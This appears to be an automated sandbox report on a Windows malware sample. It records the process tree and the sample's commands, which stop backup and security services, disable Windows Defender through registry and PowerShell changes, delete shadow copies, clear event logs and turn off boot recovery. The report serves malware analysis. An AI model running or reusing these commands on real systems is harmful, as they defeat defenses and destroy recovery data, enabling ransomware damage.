56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1176 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1176 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1576 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:824
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1976
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:288
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1928
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1644
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1704
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1696
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1432
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1768
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1968
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2020
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1176
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1576
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:852
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1632
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1132
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:600
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1828
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1928
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1404
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1952
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1712
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2032
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1264
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1172
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1736
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:580
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1972
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:440
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1808
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1840
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1748
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1740
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:760
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:536
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1724
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1892
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1664
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1644
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1692
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1256
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:912
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1520
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:288
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1904
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1584
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1756
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5aca05e59a3caefde3efd04022c34a18a
SHA1eb3a09301e99af1564505fbbc40a10b6e5162a94
SHA2562e1c992e321421e88b079b59b79a2860b199fb437e4cdcd6636a14d35daa8477
SHA51218ceddeb4487b282d027c4baa7419e495c713183381c7e5199236cb80a28df4eb943f6794da5d576e797a42768d584a9c609bbbdc46fbd600848fbbf8bfb7046